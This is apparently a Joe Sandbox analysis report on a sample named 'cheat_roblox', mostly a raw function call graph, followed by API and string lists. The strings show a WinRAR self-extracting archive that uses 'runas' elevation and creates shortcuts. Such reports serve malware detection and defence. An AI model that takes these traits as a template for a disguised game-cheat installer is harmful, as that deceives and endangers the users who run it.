27658->27745 27660 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 27659->27660 27661 7ff693e5e998 27660->27661 27663 7ff693e82320 _handle_error 8 API calls 27664 7ff693e5e97e 27663->27664 27667 7ff693e5e578 27664->27667 27665->27663 28698 7ff693e615d8 27667->28698 27670 7ff693e5e59e 27672 7ff693e51fa0 31 API calls 27670->27672 27671 7ff693e71870 108 API calls 27671->27670 27673 7ff693e5e5b7 27672->27673 27674 7ff693e51fa0 31 API calls 27673->27674 27675 7ff693e5e5c3 27674->27675 27676 7ff693e51fa0 31 API calls 27675->27676 27677 7ff693e5e5cf 27676->27677 27678 7ff693e6878c 108 API calls 27677->27678 27679 7ff693e5e5db 27678->27679 27680 7ff693e51fa0 31 API calls 27679->27680 27681 7ff693e5e5e4 27680->27681 27682 7ff693e51fa0 31 API calls 27681->27682 27683 7ff693e5e5ed 27682->27683 27684 7ff693e618c2 27683->27684 27685 7ff693e51fa0 31 API calls 27683->27685 27686 7ff693e6190d 27683->27686 27684->27686 27687 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 27684->27687 27685->27683 27686->27323 27688 7ff693e6193b 27687->27688 27690 7ff693e6870a 27689->27690 27691 7ff693e821d0 33 API calls 27690->27691 27692 7ff693e6872f 27691->27692 27693 7ff693e821d0 33 API calls 27692->27693 27694 7ff693e68759 27693->27694 27694->27635 27696 7ff693e5e627 27695->27696 27699 7ff693e5e62c BuildCatchObjectHelperInternal 27695->27699 27697 7ff693e51fa0 31 API calls 27696->27697 27697->27699 27698 7ff693e51fa0 31 API calls 27700 7ff693e5e668 BuildCatchObjectHelperInternal 27698->27700 27699->27698 27699->27700 27700->27639 27701->27644 27703 7ff693e672cc 8 API calls 27702->27703 27704 7ff693e63ee1 27703->27704 27705 7ff693e63f0f 27704->27705 27746 7ff693e640bc 27704->27746 27705->27654 27708 7ff693e63efa FindClose 27708->27705 27710 7ff693e5f598 _snwprintf 27709->27710 27772 7ff693e52950 27710->27772 27713 7ff693e5f5cc 27717 7ff693e5f5fc 27713->27717 27787 7ff693e533e4 27713->27787 27716 7ff693e5f5f8 27716->27717 27819 7ff693e53ad8 27716->27819 28038 7ff693e52c54 27717->28038 27724 7ff693e58d04 33 API calls 27726 7ff693e5f662 27724->27726 28058 7ff693e67918 48 API calls 2 library calls 27726->28058 27728 7ff693e5f677 27729 7ff693e63ec8 55 API calls 27728->27729 27736 7ff693e5f6ad 27729->27736 27733 7ff693e5f842 27733->27717 27850 7ff693e569f8 27733->27850 27861 7ff693e5f930 27733->27861 27737 7ff693e5f89a 27736->27737 27739 7ff693e5f74d 27736->27739 27740 7ff693e63ec8 55 API calls 27736->27740 28059 7ff693e67918 48 API calls 2 library calls 27736->28059 27741 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 27737->27741 27738 7ff693e5f7cb 27829 7ff693e5f8a4 27738->27829 27739->27737 27739->27738 27742 7ff693e5f895 27739->27742 27740->27736 27744 7ff693e5f8a0 27741->27744 27743 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 27742->27743 27743->27737 27745->27665 27747 7ff693e640f9 FindFirstFileW 27746->27747 27748 7ff693e641d2 FindNextFileW 27746->27748 27750 7ff693e641f3 27747->27750 27752 7ff693e6411e 27747->27752 27748->27750 27751 7ff693e641e1 GetLastError 27748->27751 27754 7ff693e64211 27750->27754 27757 7ff693e520b0 33 API calls 27750->27757 27753 7ff693e641c0 27751->27753 27755 7ff693e66a0c 49 API calls 27752->27755 27758 7ff693e82320 _handle_error 8 API calls 27753->27758 27762 7ff693e5129c 33 API calls 27754->27762 27756 7ff693e64144 27755->27756 27759 7ff693e64167 27756->27759 27760 7ff693e64148 FindFirstFileW 27756->27760 27757->27754 27761 7ff693e63ef4 27758->27761 27759->27750 27764 7ff693e641af GetLastError 27759->27764 27771 7ff693e64314 27759->27771 27760->27759 27761->27705 27761->27708 27763 7ff693e6423b 27762->27763 27765 7ff693e68090 47 API calls 27763->27765 27764->27753 27766 7ff693e64249 27765->27766 27766->27753 27769 7ff693e6430f 27766->27769 27767 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 27768 7ff693e6431a 27767->27768 27770 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 27769->27770 27770->27771 27771->27767 27773 7ff693e5296c 27772->27773 27774 7ff693e686ec 33 API calls 27773->27774 27775 7ff693e5298d 27774->27775 27776 7ff693e821d0 33 API calls 27775->27776 27779 7ff693e52ac2 27775->27779 27777 7ff693e52ab0 27776->27777 27777->27779 27781 7ff693e591c8 35 API calls 27777->27781 28060 7ff693e64d04 27779->28060 27781->27779 27782 7ff693e62ca8 27786 7ff693e624c0 54 API calls 27782->27786 27783 7ff693e62cc1 27784 7ff693e62cc5 27783->27784 28074 7ff693e5b7e8 99 API calls 2 library calls 27783->28074 27784->27713 27786->27783 27815 7ff693e628d0 104 API calls 27787->27815 27788 7ff693e53674 28075 7ff693e528a4 82 API calls 2 library calls 27788->28075 27789 7ff693e53431 __scrt_get_show_window_mode 27797 7ff693e5344e 27789->27797 27799 7ff693e53601 27789->27799 27813 7ff693e62bb0 101 API calls 27789->27813 27791 7ff693e569f8 141 API calls 27793 7ff693e53682 27791->27793 27792 7ff693e534cc 27817 7ff693e628d0 104 API calls 27792->27817 27793->27791 27794 7ff693e5370c 27793->27794 27793->27799 27810 7ff693e62aa0 101 API calls 27793->27810 27794->27799 27800 7ff693e53740 27794->27800 28076 7ff693e528a4 82 API calls 2 library calls 27794->28076 27796 7ff693e535cb 27796->27797 27798 7ff693e535d7 27796->27798 27797->27788 27797->27793 27798->27799 27802 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 27798->27802 27799->27716 27800->27799 27801 7ff693e5384d 27800->27801 27818 7ff693e62bb0 101 API calls 27800->27818 27801->27799 27804 7ff693e520b0 33 API calls 27801->27804 27805 7ff693e53891 27802->27805 27803 7ff693e534eb 27803->27796 27814 7ff693e62aa0 101 API calls 27803->27814 27804->27799 27805->27716 27806 7ff693e569f8 141 API calls 27808 7ff693e5378e 27806->27808 27807 7ff693e535a7 27807->27796 27811 7ff693e628d0 104 API calls 27807->27811 27808->27806 27809 7ff693e53803 27808->27809 27812 7ff693e62aa0 101 API calls 27808->27812 27816 7ff693e62aa0 101 API calls 27809->27816 27810->27793 27811->27796 27812->27808 27813->27792 27814->27807 27815->27789 27816->27801 27817->27803 27818->27808 27820 7ff693e53b55 27819->27820 27821 7ff693e53af9 27819->27821 27822 7ff693e82320 _handle_error 8 API calls 27820->27822 28077 7ff693e53378 27821->28077 27824 7ff693e53b67 27822->27824 27824->27724 27824->27738 27826 7ff693e53b6c 27827 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 27826->27827 27828 7ff693e53b71 27827->27828 28304 7ff693e6886c 27829->28304 27831 7ff693e5f8ba 28308 7ff693e6ef60 GetSystemTime SystemTimeToFileTime 27831->28308 27834 7ff693e70994 27835 7ff693e80340 27834->27835 27836 7ff693e67df4 47 API calls 27835->27836 27837 7ff693e80373 27836->27837 27838 7ff693e6aae0 48 API calls 27837->27838 27839 7ff693e80387 27838->27839 27840 7ff693e6da98 48 API calls 27839->27840 27841 7ff693e80397 27840->27841 27842 7ff693e51fa0 31 API calls 27841->27842 27843 7ff693e803a2 27842->27843 28317 7ff693e7fc68 27843->28317 27851 7ff693e56a0a 27850->27851 27852 7ff693e56a0e 27850->27852 27851->27733 27860 7ff693e62bb0 101 API calls 27852->27860 27853 7ff693e56a1b 27854 7ff693e56a3e 27853->27854 27855 7ff693e56a2f 27853->27855 28412 7ff693e55130 130 API calls 2 library calls 27854->28412 27855->27851 28329 7ff693e55e24 27855->28329 27858 7ff693e56a3c 27858->27851 28413 7ff693e5466c 82 API calls 27858->28413 27860->27853 27862 7ff693e5f978 27861->27862 27865 7ff693e5f9b0 27862->27865 27921 7ff693e5fa34 27862->27921 28535 7ff693e7612c 146 API calls 3 library calls 27862->28535 27864 7ff693e61189 27866 7ff693e6118e 27864->27866 27867 7ff693e611e1 27864->27867 27865->27864 27872 7ff693e5f9d0 27865->27872 27865->27921 27866->27921 28583 7ff693e5dd08 179 API calls 27866->28583 27867->27921 28584 7ff693e7612c 146 API calls 3 library calls 27867->28584 27868 7ff693e82320 _handle_error 8 API calls 27869 7ff693e611c4 27868->27869 27869->27733 27872->27921 28450 7ff693e59bb0 27872->28450 27874 7ff693e5fad6 28463 7ff693e65ef8 27874->28463 27877 7ff693e5fb7a 27921->27868 28039 7ff693e52c74 28038->28039 28040 7ff693e52c88 28038->28040 28039->28040 28677 7ff693e52d80 108 API calls _invalid_parameter_noinfo_noreturn 28039->28677 28041 7ff693e51fa0 31 API calls 28040->28041 28044 7ff693e52ca1 28041->28044 28045 7ff693e52d64 28044->28045 28678 7ff693e53090 31 API calls _invalid_parameter_noinfo_noreturn 28044->28678 28047 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 28045->28047 28046 7ff693e52d08 28679 7ff693e53090 31 API calls _invalid_parameter_noinfo_noreturn 28046->28679 28050 7ff693e52d7c 28047->28050 28049 7ff693e52d14 28051 7ff693e51fa0 31 API calls 28049->28051 28052 7ff693e52d20 28051->28052 28680 7ff693e6878c 28052->28680 28058->27728 28059->27736 28061 7ff693e64d32 __scrt_get_show_window_mode 28060->28061 28070 7ff693e64bac 28061->28070 28063 7ff693e64d54 28064 7ff693e64d90 28063->28064 28066 7ff693e64dae 28063->28066 28065 7ff693e82320 _handle_error 8 API calls 28064->28065 28067 7ff693e52b32 28065->28067 28068 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 28066->28068 28067->27713 28067->27782 28069 7ff693e64db3 28068->28069 28071 7ff693e64c27 28070->28071 28073 7ff693e64c2f BuildCatchObjectHelperInternal 28070->28073 28072 7ff693e51fa0 31 API calls 28071->28072 28072->28073 28073->28063 28074->27784 28075->27799 28076->27800 28078 7ff693e5339a 28077->28078 28079 7ff693e53396 28077->28079 28083 7ff693e53294 28078->28083 28079->27820 28079->27826 28082 7ff693e62aa0 101 API calls 28082->28079 28084 7ff693e532f6 28083->28084 28085 7ff693e532bb 28083->28085 28091 7ff693e56e74 28084->28091 28086 7ff693e569f8 141 API calls 28085->28086 28089 7ff693e532db 28086->28089 28089->28082 28095 7ff693e56e95 28091->28095 28092 7ff693e569f8 141 API calls 28092->28095 28093 7ff693e5331d 28093->28089 28096 7ff693e53904 28093->28096 28095->28092 28095->28093 28123 7ff693e6e808 28095->28123 28131 7ff693e56a7c 28096->28131 28099 7ff693e5396a 28102 7ff693e5399a 28099->28102 28103 7ff693e53989 28099->28103 28100 7ff693e53a8a 28104 7ff693e82320 _handle_error 8 API calls 28100->28104 28108 7ff693e539a3 28102->28108 28109 7ff693e539ec 28102->28109 28164 7ff693e70d54 33 API calls 28103->28164 28107 7ff693e53a9e 28104->28107 28105 7ff693e53ab3 28110 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 28105->28110 28107->28089 28165 7ff693e70c80 33 API calls 28108->28165 28166 7ff693e526b4 33 API calls BuildCatchObjectHelperInternal 28109->28166 28112 7ff693e53ab8 28110->28112 28117 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 28112->28117 28113 7ff693e539b0 28118 7ff693e51fa0 31 API calls 28113->28118 28119 7ff693e539c0 BuildCatchObjectHelperInternal 28113->28119 28115 7ff693e51fa0 31 API calls 28122 7ff693e5394f 28115->28122 28116 7ff693e53a13 28167 7ff693e70ae8 34 API calls _invalid_parameter_noinfo_noreturn 28116->28167 28121 7ff693e53abe 28117->28121 28118->28119 28119->28115 28122->28100 28122->28105 28122->28112 28124 7ff693e6e811 28123->28124 28125 7ff693e6e82b 28124->28125 28129 7ff693e5b664 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task 28124->28129 28127 7ff693e6e845 SetThreadExecutionState 28125->28127 28130 7ff693e5b664 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task 28125->28130 28129->28125 28130->28127 28132 7ff693e56a96 _snwprintf 28131->28132 28133 7ff693e56ae4 28132->28133 28134 7ff693e56ac4 28132->28134 28136 7ff693e56d4d 28133->28136 28139 7ff693e56b0f 28133->28139 28206 7ff693e528a4 82 API calls 2 library calls 28134->28206 28235 7ff693e528a4 82 API calls 2 library calls 28136->28235 28138 7ff693e56ad0 28140 7ff693e82320 _handle_error 8 API calls 28138->28140 28139->28138 28168 7ff693e71f94 28139->28168 28141 7ff693e5394b 28140->28141 28141->28099 28141->28122 28163 7ff693e52794 33 API calls __std_swap_ranges_trivially_swappable 28141->28163 28144 7ff693e56b85 28145 7ff693e56c2a 28144->28145 28162 7ff693e56b7b 28144->28162 28212 7ff693e68968 109 API calls 28144->28212 28177 7ff693e64760 28145->28177 28146 7ff693e56b6e 28207 7ff693e528a4 82 API calls 2 library calls 28146->28207 28147 7ff693e56b80 28147->28144 28208 7ff693e540b0 28147->28208 28153 7ff693e56c52 28154 7ff693e56cc7 28153->28154 28155 7ff693e56cd1 28153->28155 28181 7ff693e61794 28154->28181 28213 7ff693e71f20 28155->28213 28158 7ff693e56ccf 28233 7ff693e64700 8 API calls _handle_error 28158->28233 28160 7ff693e56cfd 28160->28162 28234 7ff693e5433c 82 API calls 2 library calls 28160->28234 28196 7ff693e71870 28162->28196 28163->28099 28164->28122 28165->28113 28166->28116 28167->28122 28169 7ff693e72056 std::bad_alloc::bad_alloc 28168->28169 28171 7ff693e71fc5 std::bad_alloc::bad_alloc 28168->28171 28170 7ff693e84078 Concurrency::cancel_current_task 2 API calls 28169->28170 28170->28171 28172 7ff693e7200f std::bad_alloc::bad_alloc 28171->28172 28173 7ff693e84078 Concurrency::cancel_current_task 2 API calls 28171->28173 28174 7ff693e56b59 28171->28174 28172->28174 28175 7ff693e84078 Concurrency::cancel_current_task 2 API calls 28172->28175 28173->28172 28174->28144 28174->28146 28174->28147 28176 7ff693e720a9 28175->28176 28178 7ff693e64780 28177->28178 28180 7ff693e6478a 28177->28180 28179 7ff693e821d0 33 API calls 28178->28179 28179->28180 28180->28153 28182 7ff693e617be __scrt_get_show_window_mode 28181->28182 28236 7ff693e68a48 28182->28236 28188 7ff693e617f2 28197 7ff693e7188e 28196->28197 28199 7ff693e718a1 28197->28199 28256 7ff693e6e948 28197->28256 28203 7ff693e718d8 28199->28203 28252 7ff693e8236c 28199->28252 28201 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 28202 7ff693e71ad0 28201->28202 28205 7ff693e71a37 28203->28205 28263 7ff693e6a984 31 API calls _invalid_parameter_noinfo_noreturn 28203->28263 28205->28201 28206->28138 28207->28162 28209 7ff693e540dd 28208->28209 28211 7ff693e540d7 __scrt_get_show_window_mode 28208->28211 28209->28211 28264 7ff693e54120 28209->28264 28211->28144 28212->28145 28214 7ff693e71f29 28213->28214 28215 7ff693e71f5d 28214->28215 28216 7ff693e71f55 28214->28216 28217 7ff693e71f49 28214->28217 28215->28158 28300 7ff693e73964 156 API calls 28216->28300 28270 7ff693e720ac 28217->28270 28233->28160 28234->28162 28235->28138 28238 7ff693e68a91 BuildCatchObjectHelperInternal 28236->28238 28239 7ff693e68bcd 28236->28239 28237 7ff693e68c1a 28240 7ff693e6e808 SetThreadExecutionState RtlPcToFileHeader RaiseException 28237->28240 28238->28239 28242 7ff693e7612c 146 API calls 28238->28242 28243 7ff693e68c1f 28238->28243 28244 7ff693e64888 108 API calls 28238->28244 28245 7ff693e628d0 104 API calls 28238->28245 28239->28237 28241 7ff693e5a174 8 API calls 28239->28241 28240->28243 28241->28237 28242->28238 28243->28188 28244->28238 28245->28238 28254 7ff693e8239f 28252->28254 28253 7ff693e823c8 28253->28203 28254->28253 28255 7ff693e71870 108 API calls 28254->28255 28255->28254 28257 7ff693e6ecd8 103 API calls 28256->28257 28258 7ff693e6e95f ReleaseSemaphore 28257->28258 28259 7ff693e6e984 28258->28259 28260 7ff693e6e9a3 DeleteCriticalSection CloseHandle CloseHandle 28258->28260 28261 7ff693e6ea5c 101 API calls 28259->28261 28262 7ff693e6e98e FindCloseChangeNotification 28261->28262 28262->28259 28262->28260 28263->28205 28267 7ff693e54149 28264->28267 28269 7ff693e54168 __std_swap_ranges_trivially_swappable __scrt_get_show_window_mode 28264->28269 28265 7ff693e52018 33 API calls 28266 7ff693e541eb 28265->28266 28268 7ff693e821d0 33 API calls 28267->28268 28267->28269 28268->28269 28269->28265 28272 7ff693e720c8 __scrt_get_show_window_mode 28270->28272 28271 7ff693e721ba 28272->28271 28273 7ff693e5b75c 82 API calls 28272->28273 28273->28272 28300->28215 28305 7ff693e68882 28304->28305 28306 7ff693e68892 28304->28306 28311 7ff693e623f0 28305->28311 28306->27831 28309 7ff693e82320 _handle_error 8 API calls 28308->28309 28310 7ff693e5f7dc 28309->28310 28310->27733 28310->27834 28312 7ff693e6240f 28311->28312 28315 7ff693e62aa0 101 API calls 28312->28315 28313 7ff693e62428 28316 7ff693e62bb0 101 API calls 28313->28316 28314 7ff693e62438 28314->28306 28315->28313 28316->28314 28318 7ff693e7fc94 28317->28318 28319 7ff693e5129c 33 API calls 28318->28319 28320 7ff693e7fca4 28319->28320 28321 7ff693e7f0a4 24 API calls 28320->28321 28322 7ff693e7fcb1 28321->28322 28324 7ff693e7fd03 28322->28324 28325 7ff693e7fceb 28322->28325 28327 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 28324->28327 28330 7ff693e55e67 28329->28330 28331 7ff693e55ea5 28330->28331 28336 7ff693e55eb7 28330->28336 28360 7ff693e56084 28330->28360 28424 7ff693e528a4 82 API calls 2 library calls 28331->28424 28334 7ff693e56134 28431 7ff693e56fcc 82 API calls 28334->28431 28336->28334 28337 7ff693e55f44 28336->28337 28425 7ff693e56f38 33 API calls BuildCatchObjectHelperInternal 28336->28425 28426 7ff693e56d88 82 API calls 28337->28426 28338 7ff693e569af 28340 7ff693e82320 _handle_error 8 API calls 28338->28340 28343 7ff693e569c3 28340->28343 28342 7ff693e569e4 28345 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 28342->28345 28343->27858 28344 7ff693e56973 28374 7ff693e55eb2 28344->28374 28444 7ff693e5466c 82 API calls 28344->28444 28349 7ff693e569e9 28345->28349 28348 7ff693e5612e 28348->28334 28348->28344 28352 7ff693e685f0 104 API calls 28348->28352 28351 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 28349->28351 28350 7ff693e56034 28354 7ff693e8236c 108 API calls 28350->28354 28350->28360 28353 7ff693e569ef 28351->28353 28355 7ff693e561a4 28352->28355 28357 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 28353->28357 28356 7ff693e5606e 28354->28356 28355->28334 28365 7ff693e561ac 28355->28365 28358 7ff693e8236c 108 API calls 28356->28358 28359 7ff693e569f5 28357->28359 28358->28360 28414 7ff693e685f0 28360->28414 28361 7ff693e56097 28430 7ff693e5433c 82 API calls 2 library calls 28361->28430 28364 7ff693e55f5d 28364->28350 28364->28361 28427 7ff693e5433c 82 API calls 2 library calls 28364->28427 28428 7ff693e56d88 82 API calls 28364->28428 28429 7ff693e5a1a0 109 API calls _handle_error 28364->28429 28366 7ff693e5623f 28365->28366 28432 7ff693e5466c 82 API calls 28365->28432 28366->28344 28368 7ff693e560a1 28370 7ff693e8236c 108 API calls 28368->28370 28368->28374 28371 7ff693e560f4 28370->28371 28374->28338 28374->28342 28374->28353 28412->27858 28415 7ff693e68614 28414->28415 28416 7ff693e6869a 28414->28416 28417 7ff693e540b0 33 API calls 28415->28417 28421 7ff693e6867c 28415->28421 28418 7ff693e540b0 33 API calls 28416->28418 28416->28421 28419 7ff693e6864d 28417->28419 28420 7ff693e686b3 28418->28420 28445 7ff693e5a174 28419->28445 28423 7ff693e628d0 104 API calls 28420->28423 28421->28348 28423->28421 28424->28374 28426->28364 28427->28364 28428->28364 28429->28364 28430->28368 28431->28374 28446 7ff693e5a185 28445->28446 28447 7ff693e5a19a 28446->28447 28449 7ff693e6af18 8 API calls 2 library calls 28446->28449 28447->28421 28449->28447 28455 7ff693e59be7 28450->28455 28451 7ff693e59c1b 28452 7ff693e82320 _handle_error 8 API calls 28451->28452 28453 7ff693e59c9d 28452->28453 28453->27874 28455->28451 28456 7ff693e59c83 28455->28456 28459 7ff693e59cae 28455->28459 28585 7ff693e65294 28455->28585 28605 7ff693e6db60 28455->28605 28457 7ff693e51fa0 31 API calls 28456->28457 28457->28451 28460 7ff693e59cbf 28459->28460 28609 7ff693e6da48 CompareStringW 28459->28609 28460->28456 28462 7ff693e520b0 33 API calls 28460->28462 28462->28456 28468 7ff693e65f3a 28463->28468 28464 7ff693e82320 _handle_error 8 API calls 28466 7ff693e5fb29 28464->28466 28466->27877 28536 7ff693e67c94 47 API calls 2 library calls 28466->28536 28467 7ff693e661d4 28469 7ff693e5129c 33 API calls 28468->28469 28474 7ff693e6619b 28468->28474 28476 7ff693e661ce 28468->28476 28470 7ff693e66129 28469->28470 28471 7ff693e51fa0 31 API calls 28470->28471 28472 7ff693e6613b BuildCatchObjectHelperInternal 28470->28472 28471->28472 28473 7ff693e661c9 28472->28473 28472->28474 28474->28464 28619 7ff693e5704c 47 API calls BuildCatchObjectHelperInternal 28476->28619 28535->27865 28583->27921 28584->27921 28587 7ff693e652d4 28585->28587 28591 7ff693e65312 __vcrt_FlsAlloc 28587->28591 28603 7ff693e6539e __vcrt_FlsAlloc 28587->28603 28616 7ff693e713f4 CompareStringW 28587->28616 28588 7ff693e82320 _handle_error 8 API calls 28589 7ff693e65503 28588->28589 28589->28455 28592 7ff693e65339 28591->28592 28594 7ff693e65382 __vcrt_FlsAlloc 28591->28594 28617 7ff693e713f4 CompareStringW 28591->28617 28592->28588 28594->28592 28595 7ff693e5129c 33 API calls 28594->28595 28596 7ff693e65439 28594->28596 28594->28603 28597 7ff693e65426 28595->28597 28599 7ff693e6551b 28596->28599 28600 7ff693e65489 28596->28600 28598 7ff693e672cc 8 API calls 28597->28598 28598->28596 28602 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 28599->28602 28600->28592 28600->28603 28618 7ff693e713f4 CompareStringW 28600->28618 28604 7ff693e65520 28602->28604 28603->28592 28610 7ff693e65524 28603->28610 28606 7ff693e6db73 28605->28606 28607 7ff693e520b0 33 API calls 28606->28607 28608 7ff693e6db91 28606->28608 28607->28608 28608->28455 28609->28460 28612 7ff693e65550 28610->28612 28611 7ff693e713b8 CharUpperW 28611->28612 28612->28611 28613 7ff693e655bf 28612->28613 28615 7ff693e655fd 28612->28615 28614 7ff693e65524 CharUpperW 28613->28614 28613->28615 28614->28613 28615->28592 28616->28591 28617->28594 28618->28603 28619->28467 28677->28040 28678->28046 28679->28049 28681 7ff693e687af 28680->28681 28690 7ff693e687df 28680->28690 28682 7ff693e8236c 108 API calls 28681->28682 28684 7ff693e687ca 28682->28684 28687 7ff693e8236c 108 API calls 28684->28687 28685 7ff693e8236c 108 API calls 28688 7ff693e68814 28685->28688 28686 7ff693e68845 28689 7ff693e6461c 108 API calls 28686->28689 28687->28690 28691 7ff693e8236c 108 API calls 28688->28691 28692 7ff693e68851 28689->28692 28690->28685 28693 7ff693e6882b 28690->28693 28691->28693 28694 7ff693e6461c 28693->28694 28695 7ff693e64632 28694->28695 28697 7ff693e6463a 28694->28697 28696 7ff693e6e948 108 API calls 28695->28696 28696->28697 28697->28686 28699 7ff693e6163e 28698->28699 28703 7ff693e61681 28698->28703 28702 7ff693e631bc 51 API calls 28699->28702 28699->28703 28700 7ff693e51fa0 31 API calls 28700->28703 28701 7ff693e5e600 31 API calls 28706 7ff693e616de 28701->28706 28702->28699 28703->28700 28708 7ff693e616a0 28703->28708 28704 7ff693e6178d 28710 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 28704->28710 28705 7ff693e6175b 28707 7ff693e82320 _handle_error 8 API calls 28705->28707 28706->28704 28706->28705 28709 7ff693e5e58a 28707->28709 28708->28701 28709->27670 28709->27671 28711 7ff693e61792 28710->28711 28712->27332 28713->27342 28714->27345 28715 7ff693e8bf2c 28722 7ff693e8bc34 28715->28722 28727 7ff693e8d440 35 API calls 3 library calls 28722->28727 28724 7ff693e8bc3f 28728 7ff693e8d068 35 API calls abort 28724->28728 28727->28724 28729 7ff693e811cf 28730 7ff693e81102 28729->28730 28731 7ff693e81900 _com_raise_error 14 API calls 28730->28731 28731->28730 28732 7ff693e8d94c 28733 7ff693e8d997 28732->28733 28737 7ff693e8d95b _set_fmode 28732->28737 28739 7ff693e8d69c 15 API calls _set_fmode 28733->28739 28735 7ff693e8d97e RtlAllocateHeap 28736 7ff693e8d995 28735->28736 28735->28737 28737->28733 28737->28735 28738 7ff693e8bbc0 _set_fmode 2 API calls 28737->28738 28738->28737 28739->28736

                                                                              Executed Functions

                                                                              Function 00007FF693E7B190 Relevance: 123.9, APIs: 60, Strings: 10, Instructions: 1421windowfilesleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: Item$_invalid_parameter_noinfo_noreturn$Message$DialogText$ButtonChecked$FileSend$ErrorLast$CloseFindFocusLoadStringView$CommandConcurrency::cancel_current_taskCountCreateDispatchEnableExecuteFirstHandleLineMappingParamShellSleepTickTranslateUnmapWindow
                                                                              • String ID: %s %s$-el -s2 "-d%s" "-sp%s"$@$LICENSEDLG$REPLACEFILEDLG$STARTDLG$__tmp_rar_sfx_access_check_$p$runas$winrarsfxmappingfile.tmp
                                                                              • API String ID: 3303814210-2702805183
                                                                              • Opcode ID: 8f6069019a7c2f952badc04f71df1685b81746b34c0ece6b3f34388106545717
                                                                              • Instruction ID: 9bb3f8e498c65225a1faf76175dc18fb2afea55de8cb315d5d16426ff9a0eca7
                                                                              • Opcode Fuzzy Hash: 8f6069019a7c2f952badc04f71df1685b81746b34c0ece6b3f34388106545717
                                                                              • Instruction Fuzzy Hash: 98D2B265A0878381EE31DB25E8562F963A9EF85780F4041B7DA4EE7AA6DF3CE544C700
                                                                              Function 00007FF693E7CE88 Relevance: 65.0, APIs: 26, Strings: 10, Instructions: 1963fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task$ButtonCheckedFileMove$DialogItemPathTemp
                                                                              • String ID: .lnk$.tmp$<br>$@set:user$HIDE$MAX$MIN$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$lnk
                                                                              • API String ID: 1830998149-3916287355
                                                                              • Opcode ID: 634bcf18b766f058e6d6ab800d2451378a363e3d2874b5d8a99853f518a5e8b8
                                                                              • Instruction ID: af4113abbb09b59e11f3a5853b6fbaf57c7183b45c08b49d7299aab77ab3eb19
                                                                              • Opcode Fuzzy Hash: 634bcf18b766f058e6d6ab800d2451378a363e3d2874b5d8a99853f518a5e8b8
                                                                              • Instruction Fuzzy Hash: 1013A072F04B8285EB20DF64D8422ED27B9EB40398F501577DA5EA7ADADF38E585C340
                                                                              Function 00007FF693E80754 Relevance: 45.9, APIs: 21, Strings: 5, Instructions: 380filesleeptimeCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
